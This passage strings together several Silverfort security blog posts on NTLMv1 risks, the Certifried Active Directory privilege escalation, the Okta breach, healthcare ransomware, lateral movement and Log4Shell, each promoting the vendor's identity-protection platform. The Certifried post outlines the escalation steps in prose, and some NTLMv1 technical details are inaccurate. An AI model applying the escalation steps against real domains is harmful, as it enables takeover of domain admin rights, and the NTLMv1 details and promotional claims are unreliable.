more about Silverfort’s Cyber Insurance solution by reading our eBook. --- - Published: 2022-08-01 - Modified: 2024-08-15 - URL: https://www.silverfort.com/blog/resolving-the-risks-of-ntlmv1/ Although a key part of cyber resilience is adapting to changes in technology, addressing attack surfaces that have remained constant is equally critical. This is because most enterprises have maintained a significant amount of legacy infrastructure in addition to newer cloud workloads and SaaS applications. Sometimes this is due to the operational cost of migration as well as concerns about potentially breaking critical processes by doing so. In other cases, this is simply because the IT team is not even aware of the legacy components’ existence. But whatever the reason, legacy infrastructure is a ripe target for threat actors, as it’s always less secure than its modern alternatives.   In this post we explore a prominent example of legacy infrastructure: the NTLMv1 authentication protocol. This early version of NTLM included critical security weaknesses, enabling attackers to execute a variety of identity-based attacks. And even though it’s now more than 30 years old, it can still be found in production environments — exposing them to risks of compromise that are extremely hard to detect. We’ll then show how Silverfort enables enterprises to overcome the risks from NTLMv1 with discovery, monitoring, and control on every authentication and access attempt that still utilizes this archaic protocol.   NTLM Authentication: A Brief History According to Wikipedia, “In a Windows network, New Technology LAN Manager (NTLM) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager. The NTLM protocol suite is implemented in a Security Support Provider, which combines the LAN Manager authentication protocols NTLMv1, NTLMv2 and NTLM2 in a single package. ” (NTLM2 combines both NTLMv1 and NTLMv2. )  NTLMv1 was released back in 1993 and is a challenge-response authentication protocol, which means the authentication process is carried out in three steps:  The client machine establishes a network connection to the target server. The server sends a challenge to the client machine. The client machine responds to the challenge and the server either allows or denies access based on the response. In 1998, NTLMv2 was released on Windows NT 4. 0 SP 4 and has been the current version of the protocol ever since. General NTLM Security Issues All versions of NTLM authentication face the following security issues: Lack of salting makes the hash password-equivalent, meaning that if you are able to grab the hash value from the server you can then authenticate without knowing the actual password. This means that an attacker who can retrieve a hash – and there are various ways to dump it from the machine’s memory – can then easily access a target server and impersonate the actual user. While the server does indeed validate the identity of the client, there is no corresponding validation of the server’s identity, which opens up the possibility of a Man-In-The-Middle (MITM) attack. NTLMv1 lacks a client challenge – in case of an attack on NTLMv1, the attacker can force the client to calculate NTLMv1 Response with a known server challenge. Then, the attacker can efficiently guess the user’s password by checking the NTLMv1 response against a rainbow table. Lack of MFA support deprives the protocol of any protection in the case of a compromised password or hash.   These concerns led Microsoft to replace NTLM with the more secure Kerberos authentication protocol as the default in AD environments, although keeping NTLM as a backup. But even within NTLM, NTLMv1 is significantly less secure than its successor, NTLMv2. What Makes NTLMv1 a Security Risk The security level of the protocol depends on the challenge – the harder to compromise, the more secure the authentication.   In the case of NTLMv1, the difference lies in their specific challenges: NTLMv1 produces a challenge with a 16-bit fixed-length number while NTLMv2 produces challenges of variable lengths. NTLMv1 uses a weak DES encryption algorithm that is fast to decrypt, making it vulnerable to brute-forcing, while NTLMv2 uses the slower HMAC-MD5 that can better resist these attacks, since decrypting can’t take place in real time.   Any system that uses NTLMv1 authentication is, therefore, exposed to compromise since attackers can easily craft a way to accept the challenge and thus gain access to the system.   With this in mind, it’s easy to understand why IT and security teams want to move away from NTLMv1. In theory, it seems easy – simply find all systems that use NTLMv1 and switch to a more secure protocol. In practice, however, it is much more challenging. Obstacles in Detecting and Removing NTLMv1 In an ideal world, there would be some filter that when clicked would reveal all the NTLMv1 authentications taking place within an environment. Unfortunately, the reality is not that simple. The most straightforward path is to enable Logon Success Auditing on the domain controller. According to Microsoft’s documentation, each endpoint should then generate an event with the required information (Success Auditing Event 4624, which contains information about the version of NTLM. The received event logs contain a ‘Package Name (NTLM only)’ field that state the NTLM’s version). However, collecting these logs cannot be centrally done on the DC and must be retrieved from each individual machine. As well, in many cases the event doesn’t have the NTLM version data or hasn’t even been created.   Moreover, in most cases, NTLMv1 is found within a legacy application where NTLMv1 authentication is performed against the app server. As such, there is no assurance that the programmer who coded the application implemented a sound auditing mechanism. If the application uses a Windows server, it may be partially audited locally, for example, if it uses internal windows libraries such as IIS authentication (Web server application). However, if the application is completely third-party written, no logs are audited at all. In that case, there is no way to find out if NTLMv1 is in use without intrusive steps (such as decrypting the packets or analyzing the actual app’s code). While NTLMv1 authentications can be detected partially using network level inspection, such inspection is not possible since in most cases this traffic is encrypted. So the challenge lies not only in the inherent insecurity of NTLMv1 itself but also in the difficulty of determining whether it’s being used within a given environment.   Silverfort’s Protection for the NTLMv1 Attack Surface The Silverfort Unified Identity Protection platform provides organizations with the unique ability not only to discover all NTLMv1 authentications within an environment but to actively block them as well.   Silverfort analysis engine detects NTLMv1 authentications and flags them as a risk indicator. This risk indicator can be used, both as a filter to discover machines that perform such authentications, and as an access policy trigger. Let’s see how it looks within the Silverfort console: Discovery Within the Authentication Logs screen, check the NTLMv1 Authentication box. Once checked, all matching authentications are displayed, providing actionable knowledge about which machines are using NTLMv1 to help decide whether to disable them. NTLMv1 enabled in Silverfort’s Authentication Logs screen Protection  In a similar manner, Silverfort enables the use of an NTLMv1 risk indicator as a trigger to activate an access policy. The action would then be either: Deny: Choose this option if you don’t want to allow NTLMv1 at all within the environment as an additional precautionary measure. Silverfort policy to deny access via NTLMv1 MFA: Choose this option if for any reason you can’t eliminate the use of NTLMv1 (for example, if there is an old application that might break and endanger critical business processes). In this case, even if the authentication flow is compromised, the true user must verify its identity via MFA in order to gain access, effectively disarming attackers’ ability to leverage the protocol’s weaknesses for malicious access. Silverfort policy to require MFA step-up when authenticating via NTLMv1 The Path to Comprehensive Security In today’s hybrid environment there are many types of systems existing side by side, so comprehensive security means monitoring and protecting all of them. NTLMv1 is just one example of the issues with legacy systems; it’s also important to understand that when the security weakness resides in the legacy infrastructure, a compromise here can enable attackers to gain access to other parts of the environment as well. The right way to think of it is not so much securing legacy systems but rather preventing legacy systems from becoming the gateway to your environment.   Silverfort’s Unified Identity Protection is the first platform that was purpose-built to protect against identity threats across the entire hybrid enterprise – whether the targeted resource is a SaaS application, a cloud workload, or an on-prem server. Silverfort extends MFA and modern identity security to all core resources that couldn’t be protected before – including NTLMv1. Is NTLMv1 an attack surface you want to address? Schedule a meeting with one of our experts here. --- - Published: 2022-07-11 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-proactively-detects-protects-against-certifried-attacks/ In early May 2022, the Certifried (CVE-2022-26923) vulnerability was published. This vulnerability abuses Kerberos certificate extension and its Active Directory elements. It’s a privilege escalation vulnerability in which a weak user gains domain admin privileges in an Active Directory environment. How does it work? The Certifried vulnerability allows an attacker to elevate privileges from a weak user to a domain admin. In short, each user can create up to 10 machine accounts in a domain. An attacker can alter a weaker machine to the target’s computer name and request a malicious certificate on its behalf. Next, the attacker can authenticate as the target computer using the crafted certificate and run malicious code with high privileges. The vulnerability has a wide impact due to its minimal prerequisites. All it requires is a connection to the network and a weak user. Each identity in AD has attributes. Some of them are unique across the domain, e. g. , Service Principal Name (SPN), and some can have duplicates. The attacker creates a weak machine account, abuses its dNSHostName attribute and alters it to the target’s hostname. The attacker then requests a certificate with the Subject Alternative Name (SAN) identical to the target’s hostname. Normally, this attack flow cannot be completed, because changing the dNSHostName must match the SPNs of the server. However, if the SPNs are deleted, then the issue is resolved; it is possible to change the dNSHostName. The vulnerability also deals with how the domain controller maps a certificate to the identity object in Active Directory during the authentication process. It is possible to request a certificate for Client Authentication purposes and embed the dNSHostName as the SAN. The returned certificate can now be authenticated to the domain controller using the PKINIT extension and identified as the target host. One way to exploit this vulnerability, is to authenticate to Active Directory as a target domain controller, and use that to steal the credentials of all the users in the domain. Mitigation Microsoft released the May 10 patch for Windows Servers to add another layer of protection to certificate creation and authentication. However, it will only apply to certificates requested after patch installation. Enforcement mode will begin by May 9, 2023. Silverfort Unified Protection Platform has the capability to inform you of ongoing Certifried attacks, in case any malicious certificates were created before the patch. This latest security guideline regarding Certifried will provide detailed instructions on how to defend against a Certifried attack. We created a simple Powershell script to automatically collect all data needed for creating a custom filter with Silverfort. Please run the following command on a domain workstation powershell $dc_list = Get-ADDomainController -Filter * | Select-Object Name, ipv4addresswrite “https:///Logs? deviceOrServer=$($dc_list. ipv4address -join‘,’)&excludedFilters=deviceOrServer&includeSources=$($dc_list. Name. ToLower -join ‘,’)&service=krbtgt”Replace with your Silverfort’s console URL. Paste the output in your browser and log in Add any known source IP addresses your domain controllers may be using, if they are missing from the automatically-generated list, e. g. , addresses of NAT devices. Click on Save Filters, give it a name and click Save Now that the filters are created, click the cogwheel on the top right of the screen: Then select CUSTOM REPORTS Fill in the required details, select the two newly created filters and click Save. You will receive regular reports about certified exploits regarding all your domain controllers. If this filter produces any authentication results, your environment may be under attack. In this case, the domain controllers appearing in the logs might have been compromised and need to be examined. Please verify for each authentication the source hostname matches the source IP. If the IP is unfamiliar, there might be an attempted Certifried attack in your environment. Reach out to us if you need any assistance. --- - Published: 2022-04-12 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-raises-65m-in-series-c-funding/ We’re very excited to announce that we’ve raised $65M in Series C funding! A few words about what this milestone really means: We all know that identities have become the most vulnerable attack surface in enterprises, just because they’re the easiest to target. Yet even though every organization seems to have a solution in place, these attacks persist in dominating the threat landscape. It’s taken a while for the market to understand the depth of the problem. But our rapid growth and customer adoption, and this new round of funding, are demonstrating that we’re solving a major problem from which almost every organization suffers - identity-based attacks. Cyber attacks that leverage compromised user identities and credentials are now used in 80% of all data breaches and ransomware campaigns. This happens because enterprise identity is currently built in silos across different environments, providing inconsistent and insufficient security controls for many types of corporate resources, and ultimately is unable to provide full protection across all users, systems, and environments. Where do we come in? Using unique technology, Silverfort enables Identity Threat Detection and Response (ITDR), Identity Threat Prevention (ITP), Multi-Factor Authentication (MFA), and Zero Trust security policies as a unified and transparent layer on top of all current IAM solutions, both legacy and modern. It extends identity threat protection across all sensitive corporate and cloud assets, without requiring any agents, proxies, or code changes. Silverfort extends protection even to systems and access interfaces that couldn’t be protected by any other product until today, and which currently enable attackers to bypass all other MFA and identity security solutions (for example, command-line interfaces such as Remote PowerShell and PsExec, legacy applications, industrial systems, machine-to-machine access). In other words, the time is right for us to emerge as the independent, vendor-agnostic, unified security layer that works on top of all IAM platforms... the first Unified Identity Threat Protection company. This is why we’re growing like crazy. Over the past year we’ve almost tripled our customer base, revenues and headcount. And the momentum is only growing stronger. We appreciate your support, and we invite you to see a demo of our platform, or to join our team.   Best wishes, The Silverfort Team --- - Published: 2022-04-10 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/the-okta-breach-lessons-only-the-attackers-can-teach/ “There is no teacher but the enemy. No one but the enemy will tell you what the enemy is going to do. No one but the enemy will ever teach you how to destroy and conquer. Only the enemy shows you where you are weak. Only the enemy shows you where he is strong. And the rules of the game are what you can do to him and what you can stop him from doing to you. " (Ender’s Game, Orson Scott Card) While the recently disclosed attack on Okta appeared to be limited in scope and impact, it nevertheless provides key insights into the critical role the use of compromised credentials played in this breach. Placing this breach within the overall context of today’s threat landscape reveals that user identities have become a top targeted attack surface. How should this change in the threat actors’ playbook impact our security architecture and practices so we can win against attacks that employ user accounts as their main attack vectors? In this article, we explore the key lessons that the Lapsus$ threat actors have taught us in this breach and how we can use these lessons to enhance the resilience of our environments to identity threats. A short recap of the Okta breach Attackers from the Lapsus$ attacking group managed to compromise an endpoint of a third party support engineer via RDP. Following the endpoint’s compromise, the attackers disabled the endpoint protection agent and downloaded various tools such as ProcessHacker and Mimikatz. They then used these tools on the compromised endpoint to get credentials for the O365 account, associated with a company the third party service provider acquired in August 2021. Once this access was obtained, the attackers created a new account and configured a rule to forward all mail to this account, potentially impacting 366 Okta customers. Key takeaways for security stakeholders: Lesson #1: Attackers target your weaknesses So what has the enemy taught us through this breach? We believe... a lot. First and foremost we were reminded (nothing new) that the chain is only as strong as its weakest link and that attackers initially target these weak links to ultimately access what’s behind the stronger ones. Based on the attack flow we’ve described, let’s look at the weaker links Lapsus$ threat actors have targeted to launch their attack: Weakness #1: Addition of new M&A environments Nothing new here, but still a useful reminder. Mergers and acquisitions are an integral part of the business lifecycle. That said, there is no easy way to absorb one live IT environment into another one. While there are no easy solutions here, security teams should take a page from the attackers’ playbook and dedicate increased attention to these new portions of their networks, since they are the most likely to be targeted. Weakness #2: Supply chain and third party access The modern enterprise IT environment is an ecosystem, not a standalone entity. That means that by design people are connecting to your environment from machines you don’t manage with security practices that might not align with yours, while you remain accountable for a breach that occurs because of them. At the end of the day, the only aspect of the supply chain ecosystem that you can control is the access policy and the requirements 3rd parties should fulfill to be trusted. Weakness #3: Cloud resources in a hybrid environment are exposed to attacks originating from on-prem machines At the end of the day, even if you’re cloud-native and digitally transformed there will be non-web resources either interfacing with your environment or being an actual part of it. The most intuitive example is the workstations your employees use to connect to SaaS applications and cloud workloads. If such a workstation is compromised, attackers can easily get their hands on the stored credentials and advance their presence, not only to additional machines on-prem but also to SaaS applications and cloud workloads. Examining these weaknesses reveals that they are not on the magnitude of an unpatched vulnerability or misconfigured policy. They cannot be simply eliminated with a click of a button and are not a result of any security malpractice. Rather they are inherent to the infrastructure of any IT environment. Lesson #2: Compromised credentials were the attack's backbone While each of the first two weaknesses opens the environment to several types of attacks, the third weakness – exposure of cloud resources to attacks originating from the on-prem environment – radically intensifies their impact. Compromised credentials played a dual role in this attack. First, in the initial access to the compromised machine, and second, in accessing O365. So, it’s the identity -based attack vector that wove the three weaknesses into an extremely effective attack that puts at risk resources that appear to be under high protection. Lesson #3: An identity attack surface can only be protected when unified Dispersed identity protection creates blind spots. If remote access via RDP is protected by the VPN provider, SaaS login by CASB and internal connection between on-prem machines by an EDR attackers will bypass them one by one. The better alternative is to centrally monitor and protect every authentication and access attempt, so a detected risk in a user login to one resource enables restriction of this user’s access to all other resources as well. Every security stakeholder can take away from this analysis one simple truth: in today’s enterprise environment, identity is the key attack surface. And our security architectures must adjust, respond, and become native to this insight if we wish to gain the upper hand in the battle against cyber attackers. Stopping the enemy The Okta breach spotlights a trend that has been slowly increasing in recent years. Attackers favor launching identity-based attacks, using compromised credentials to access targeted resources. And they do so because this attack vector is the least guarded in today’s enterprise environment. The response from our side should be to acknowledge that the identity is a critical attack surface and protect it accordingly – with real-time prevention, detection, response to identity threats on-prem and in the cloud, that applies equally to RDP connection to remote workstations, web login to a SaaS application, and command-line access to an on-prem server. About Silverfort Silverfort has pioneered the first Identity Threat Protection platform purpose-built for real-time prevention, detection, and response to identity-based attacks that utilize compromised credentials to access targeted resources. Silverfort prevents these attacks through continuous monitoring, risk analysis and real-time enforcement of Zero Trust access policies on every user, system, and environment on-prem and in the cloud. Learn more about Silverfort identity threat protection. --- - Published: 2022-03-21 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/protecting-against-healthcare-ransomware-attacks-with-mfa/ Security and data breaches are a major concern for every organization, and even more so for healthcare providers. The sensitivity of healthcare and patient data and the critical need for the 24/7 functioning of life-supporting medical equipment are the key reasons why this vertical is extensively targeted by ransomware attacks. Additionally, the average healthcare organization lacks security resources and relies on legacy and unsecured systems. These reasons explain why cyberattacks are more successful in the medical field compared to other industries. The healthcare threat landscape is changing as organizations deploy more cloud-based applications to improve productivity and improve patient care. Additionally, healthcare providers and physicians have embraced telehealth, which has increased the attack surfaces and vulnerabilities for healthcare organizations to defend against. To help healthcare organizations with the different security challenges, the security community has developed innovative technologies that make identity theft increasingly difficult. The most effective of these solutions is multi-factor authentication (MFA). Modern MFA solutions have replaced passwords and other identification methods, which were easy to exploit and decrease the likelihood of an attacker gaining access to organizational resources. While MFA is the ideal solution in theory, it has usability and flexibility gaps that create friction for medical professionals' adoption. To solve this gap of identity access protection, Silverfort is the first solution that delivers MFA protection by communicating directly with the IAM (Identity and Access Management) solution itself, monitoring the authentication protocols, and enforcing MFA on top of them. Increased Attack Surface With the rapid adoption of modernized technology and applications, healthcare organizations' attack surfaces are increasing by the day. More healthcare organizations are adopting cloud-based applications and services to simplify their IT operations, which also allows them to increase clinical productivity and improve patient care. On the other hand, by adding more cloud-based services to their existing healthcare IT architecture, the resulting mix of on-prem and legacy applications increases the number of exposed attack surfaces. Additionally, one of the more recent challenges facing healthcare organizations is protecting the attack surfaces of telehealth. Telehealth has advanced the adoption of remote working, cloud-based tools and applications. While this has been a positive for both medical professionals and their patients, it comes with major security risks. It has increased the amount of connected medical devices and technologies, which has resulted in a major growth of successful cyber attacks on healthcare organizations. Healthcare Needs More Security Staff Security is a harsh discipline for those who don’t invest in security experts and technology. The problem for most healthcare organizations starts with their personnel. Like most industries, healthcare experiences a security skill and headcount shortage. Without the proper amount of experts in place, organizations will be challenged to minimize the vulnerabilities and attacks in hospital networks and medical devices while designing, implementing, and maintaining new security features. Healthcare and Ransomware The healthcare threat landscape has drastically evolved over the years and ransomware is the primary attack-type of choice. From an attacker’s perspective, targeting healthcare organizations can be financially motivating due to hospitals' wiliness to pay ransomware payout to ensure that sensitive data won’t be exposed. Additionally, attackers could be motivated by the fact that the healthcare industry has reduced security postures compared to other industries and is seen as an easy and fruitful target. As patient lives are placed at risk when systems fail or are down, it forces healthcare organizations to have a zero-tolerance approach to downtime when a ransomware attack occurs. Aside from the financial motivation, patient data are a far richer reward for attackers; healthcare data is the most valuable kind of stolen personal information, as patient records can fetch up to $1,000 each on the dark web. As ransomware evolves so does the drastic result the attack can have on healthcare organizations. Attackers can extract sensitive data without compromising their efforts to extract ransoms. New strains of ransomware can enable attackers to drain out the outpatient records while locking down systems simultaneously. In response, healthcare providers have no choice but to invest the money and resources to ensure they won’t fall victim to devastating ransomware attacks. MFA is the Answer For healthcare organizations to improve their data protection it must start on the identity level, and therefore multi-factor authentication (MFA) is the solution to protect the identity of their employees. MFA requires users of a website or application to identify themselves as evidence that they are whom they say they are. This has allowed modern Multi Factor Authentication (MFA) solutions to completely replace passwords and other identification methods that are easy to exploit. Enterprise MFA solutions help improve identity security and decrease the chance of unauthorized access occurring and gaining access to sensitive resources and records. Not only is MFA more secure, but it is more user-friendly and increases productivity. Many healthcare companies require their employees to use a new security key on top of a complicated password every time they log in which complicates the process. On the other hand, MFA speeds up the process by simplifying logins and authentication without creating friction with the user. Is MFA Right for Healthcare? While MFA for healthcare is the ideal solution for authenticating identity, it needs to be implemented and used correctly. Traditional MFA solutions add complexity and increase the number of moving parts in the authentication process. This results in potential authentication system failure, which defeats the entire purpose of deploying an MFA solution. While a good MFA solution shouldn’t have much downtime, it can occur. When it does, it impacts user productivity. Medical professionals typically can’t afford slow authentication processes, as they need a solution that will log in them instantly and authenticate their identity. For example, the badge system that most hospitals have deployed: a healthcare worker taps a badge on a reader to log in and out; by swiping their badge, they now have all the access to medical systems and patient records. This creates a major security risk as not every healthcare worker should have access to everything, especially if an attacker has exploited the user's badge identity and can suddenly move laterally. Many doctors, especially in the emergency medical field, have been hesitant to deploy MFA due to not being by their phone at all times but this should not affect the entire organization. Instead, these doctors and systems should be put into a specific security group and their security team needs to create specific risk-based and behavior-based policies for these medical professionals and monitor their access activity daily to ensure there is no malicious activity. The Solution: Unified Identity Protection Platform To help healthcare organizations solve the different security challenges of identity access and threat protection, Silverfort has pioneered the world’s first Unified Identity Protection platform that consolidates security controls across corporate networks and cloud environments to block identity-based attacks. Silverfort seamlessly integrates with all existing MFA solutions and extends MFA to any resource and access interface across the on-prem and multi-cloud enterprise environment. This includes assets that couldn’t be protected with MFA before, such as medical legacy devices and applications, IT infrastructure, and more. Silverfort analyzes the context of each user (or service account) access request, leveraging Silverfort’s AI-driven risk engine. It then applies the appropriate access policy. For example, if the risk level is high, Silverfort can step up the authentication requirements and require the user to authentication with MFA. This process can stop an attacker from moving laterally and running a successful ransomware attack. By enforcing MFA at the identity level it creates another layer of security against incoming identity attacks. Learn more about Silverfort’s Unified Identity Protection platform. --- - Published: 2022-02-23 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/lateral-movement-attacks-blind-spot/ Lateral movement attacks are effectively a blind spot in today’s security stack, which cannot detect and prevent them in real-time. This blind spot is the result of a long-lasting paradigm that delegates identity protection to the endpoint, network, and cloud security products rather than acknowledging user identities for what they really are – a standalone attack surface that must be addressed and protected in a dedicated manner. In this article we suggest a conceptual framework to better analyze and understand this blind spot within the overall context of cyber protection to enable various enterprise security stakeholders to reflect on their security stack and evaluate its exposure to lateral movement attacks. A Brief Lateral Movement Recap Expanding Foothold from Patient-Zero to Additional Machines Lateral movement is the general term to describe the attack stage that follows an initial compromise of a machine (AKA patient zero) by accessing and executing code on additional machines in the environment. Performing lateral movement is a key necessity for the attacker since in most cases the patient zero, while being more vulnerable than other machines in the environment, cannot by itself satisfy the attack’s objectives. From that arises the need to access additional machines and form a path to fulfill the attack’s objectives. Compromised User Credentials are Lateral Movement’s Key Enablers But how does movement from machine to machine take place? In an enterprise environment there is only one way to do this: log in with user credentials. Hence, what would typically follow the patient-zero compromise is a search for the user accounts that are logged in to the machine and their credentials (a relatively trivial task that many open-source tools and either CMD or PowerShell scripts can perform). The attacker can then use various admin tools to get the names of other machines in the environment and attempt to log in to them with the newly obtained credentials. Once successful, this process is repeated on the next machine and so on. One of the common threads to many attacks is the attempt to hunt for admin credentials, as these have higher access privileges and access to the Domain Controller. In terms of risk and the potential damage, it is easily seen that lateral movement is the key component in turning a cyberattack from a local event into an enterprise-grade incident. However, despite the significant advances that were made in cybersecurity during the past decade, lateral movement is still a blind spot in the enterprise security stack, creating a critical security gap. Let’s reflect on the key concepts of cybersecurity detection and prevention to understand why. Attack Detection 101: The Anomaly Factor In most cases, malicious activity differs from a legitimate one. To detect a malicious activity the essential question is what anomaly does it generate? In some cases, the anomaly is easy to track – for example, a file signature that has already been flagged as malicious or network traffic to an external IP that is known to be malicious. But threat actors continuously refine and enhance their tools, striving to eliminate or at least minimize these anomalies as much as possible. So we often see attacks that consist of a completely normal activity in a certain aspect but are anomalous in another. For example, a memory corruption exploit of a vulnerability in Chrome doesn’t trigger a file anomaly since it hijacks the running Chrome process. However, the process behavior within memory and its interaction with the OS radically differs from the normal Chrome execution flow. Attack Detection 102: The Multi-Aspect Factor But what do we mean when we talk about aspects? We can think of aspects as different perspectives of a single activity. Let’s take a typical scenario of a malicious payload that executes, opens an outbound connection with a remote server, and downloads an additional file. The endpoint protection aspect looks for anomalies in the process behaviors and file signatures, while the network protection aspect would look for anomalies in the network traffic. A sound security stack would include as many aspects as possible to increase the detection chances of malicious activity. Single-aspect protection is bound to fail because there are attack vectors that, by definition, are legitimate in one aspect and malicious in another. The simplest example is C2C communication. There is no anomaly in the file or process that opens the connection since it is the same one that the operating system uses for any other legitimate connection. So, if we’d rely only on the endpoint aspect this activity would most probably go undetected. However, the network aspect that is concerned with network traffic would easily determine that the destination address is malicious and block the connection altogether. Attack Prevention 101: The Real-Time Factor The detection of malicious activity is the first step. However, the actual security value is delivered by the ability to prevent or block the detected malicious activity in real-time. In that manner, an Endpoint Protection Platform (EPP) is capable not only of determining whether a running process features malicious behavior but also has the power to terminate this process’s execution in real-time. Similarly, a firewall can both determine that certain network traffic is malicious as well as blocking altogether. Let’s see now how the anomaly, aspect and real-time factors map into lateral movement protection. Lateral Movement Attack and The Identity Attack Surface The reason why lateral movement attacks are a blind spot is that endpoint and network security controls don’t possess the required aspect to detect its entailed anomalies and don’t have the ability to block it in real-time. Let’s dive deeper to understand why. Lateral Movement is an Identity-Based Attack Lateral movement attacks are carried out by providing valid (yet compromised) user credentials to log in to resources (servers, workstations, apps, etc. ) in the targeted environment. This introduces a severe detection challenge because the authentication performed by an attacker that performs lateral movement is essentially identical to an authentication made by a legitimate user. Both entail an authentication process that comprises passing credentials to an identity provider (for example Active Directory), that validates them and grants or denies access based on this validation. In that manner, a lateral movement attack is at its core a series of authentications that utilize the legitimate authentication infrastructure for malicious purposes. Lateral Movement Detection Challenge #1: A Low Anomaly Factor This means that we’re dealing with a very low anomaly factor to begin with. The only difference between a malicious authentication and a legitimate one is that the first is performed by an attacker while the latter by a malicious user. That doesn’t leave much anomaly margin to work with since the anomaly would not be found in the authentication itself but rather in its surrounding context. Let’s understand why disclosing this context is beyond the scope of the endpoint and network protection aspects. Lateral Movement Detection Challenge #2: Endpoint and Network Aspects Mismatch As previously explained, lateral movement is a series of malicious authentication from a compromised machine to another one. The endpoint protection aspect is not efficient in determining that such authentication is malicious because it is focused on anomalies in file and process execution. This aspect cannot reveal any anomaly due to the resemblance we’ve described. If, for example, an attacker chooses to employ the PsExec tool to remotely connect from patient zero to another machine with a set of compromised credentials, the launched process will be PsExec. exe – which is the same process that would be launched had a legitimate admin chosen to perform the same connection. The network protection aspect would fall short in detecting lateral movement for the same reason. The network traffic from patient zero to the new machine is 100% similar to the one that a legitimate helpdesk would generate when remotely troubleshooting an endpoint issue for an employee. Lateral Movement Prevention Challenge #3: The Lack of Real-Time Factor within Endpoint and Network Solutions Let’s assume that we’ve managed to partly overcome the detection difficulties. There is still a critical challenge to solve: the lack of real-time prevention capabilities at both endpoint and network protection products. Even if the EPP somehow manages to determine that an executed process implies without any doubt that a lateral movement attack is taking place, it cannot do anything to prevent it. While theoretically, a network solution might be able to provide this prevention with tight segmentation of the environment, in practice it won’t prevent lateral movement within the compromised segment itself, nor will it block compromised admin users that are typically exempt from the segmentation’s limitations. In fact, the only component in the enterprise IT stack that can prevent lateral movement in real-time is the Identity Provider itself, which in most on-prem environments would be Active Directory. Active Directory Detection and Prevention Gaps AD governs the authentication process itself and determines whether an access request to a resource is granted or denied. If any real-time prevention against lateral movement is to be found anywhere, it would be there. However, two major problems inhibit AD from performing the real-time protection task. The only security check AD can perform is to validate the user-credentials match – in the case of lateral movement it’s no use because the match exists (that’s the whole purpose of compromising these credentials in the first place). So, the potential of real-time protection can’t be fulfilled because AD will never know when to apply it. Conclusion - Lateral Movement Protection Dead End To summarize, endpoint and network protection can’t efficiently detect lateral movement attacks and don’t have the ability to prevent them. Active Directory lacks the ability to discern between a lateral movement attack and a legitimate authentication, which leaves its protection potential dormant and unable to be used for actual protection. This is the main reason why most organizations architect their security stack to prevent the attack stages that come before the lateral movement and reactively minimize its damages after its detection. But the lateral movement itself is not contained or addressed. The Silverfort Way: Lateral Movement Real-Time Prevention with MFA The Silverfort Unified Identity Protection platform is the first solution to deliver seamless real-time prevention of lateral movement attacks by natively integrating with Active Directory to add a security layer of both risk analysis and Multi-Factor Authentication (MFA). To learn more about Silverfort’s capabilities, visit our Lateral Movement Prevention Protection page or schedule a demo with one of our experts. --- - Published: 2021-12-16 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/are-you-ready-for-stage-2-of-the-log4shell-attacks/ The tidal waves from the newly discovered Log4Shell zero-day attack are yet to be determined. Many organizations have hurried to patch their servers, making them immune to the massive attacks that were reported. However, patching your servers alone is not enough to ensure that this critical attack surface has been covered. While running the updated log4j version indeed secures against future attacks, one should also address the possibility that some servers may have been compromised prior to the patch. In this article, we’ll explain the feasibility of this scenario and follow up with actionable recommendations to proactively mitigate it. Log4Shell-In-the-Wild Activity Recap Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications. The initial reports on Log4Shell (CVE-2021-44228) date to December 9. These reports were quickly followed by extremely rapid development of new exploit variants with new variations of the original exploit being introduced rapidly- over 60 in less than 24 hours. Also, within these 24 hours alone, attacks on organizations worldwide have surged, with various security providers reporting that vast portions of their customers were targeted by hackers attempting to exploit the vulnerability. Currently the exploit is now rapidly integrated into the arsenal of common malware and is also reported to be in use by advanced nation-state attack groups. Assume Breach – Attacked Until Proved Otherwise The enormous volume of these attacks presents a challenge to any security stakeholder who has patched their vulnerable servers. The rapid development and usage pace of the vulnerability exploitation mean that there is at least a viable probability that your servers might have been targeted by the exploit prior to the patching taking place. We strongly believe that security best practice, in this case, is to act as if your servers have been compromised until this threat is reliably disproven. Let’s review the various implications of such a compromise in order to best understand how to efficiently confront this threat. Possible Stage 2 Threat Scenarios Following a Silent Compromise Laying Low Until the Time is Right Log4Shell by itself enables attackers to establish an initial foothold in your environment. This foothold is not the attackers’ goal but rather an essential preliminary stage. That means that if attackers have indeed exploited the vulnerability and gained a presence in one of your web-facing servers, there is no incentive for them to draw attention to themselves. Rather, they are more likely to operate low and slow, harvesting additional credentials and perhaps expanding to additional machines in your network before attempting to execute the attack’s actual objective. To judge from the common exploits that we see, there is a good chance that this objective is a ransomware attack that would shut down your operations, but it also can be theft of your intellectual property or PII of your employees or customers. Sell the Access Alternatively, the attacker may not utilize access to the network themselves. Rather, they could sell their server access to a third party on the dark web. End-Result: Exposure to Lateral Movement and Ransomware Propagation One way or another, there very well may be attackers with the keys to your kingdom, namely the usernames and credentials of your standard and admin users. This is bad because while the initial compromise damages a single machine, it’s the lateral movement part that turns a local event into an enterprise-wide risk. Compromised credentials enable attackers to do just that. The Christmas Effect Let's not forget that attackers typically opt for holidays and weekends. The coming Christmas holidays are an especially bad time for your employees’ credentials to be in the wrong hands. We believe that attackers of both types described above will stay silent in the meantime, waiting for the right hour - Christmas can be the perfect timing. Silverfort Best Practice Recommendations for Compromised Credentials In light of all the above, we’ve compiled a set of actionable best practices to proactively confront the possibility that some of your servers were and maybe are still compromised by attackers that exploited the Log4Shell vulnerability: Patch End-to-End Ensure that all vulnerable systems are patched with special attention to your internet-facing servers. Isolate the applications you can’t patch both at the network level and at the identity layer. Prevent Attackers’ Ability to Utilize the Compromised Credentials for Further Malicious Access Require MFA for all admin accounts for all resources in the environment. Also ensure that the MFA protection applies to access interfaces, including command lines utilities such as PsExec, PowerShell etc. , and not just to RDP and desktop login. Restrict service accounts to operate only from permitted computers. You should base this on these accounts' predictable and repetitive behavior. Monitor your environment closely for suspicious and malicious events such as a surge in simultaneous access requests from a single user, or any other deviation from your user account’s standard activity. Following these recommendations will highly increase your resilience to a pre-existing Log4Shell based compromise and would void the attacker’s ability to leverage their stolen credentials for further malicious access. The Silverfort Unified Identity Protection platform enables its users to extend Risk-Based Authentication and MFA to any user, service or system, providing proactive protection against identity-based 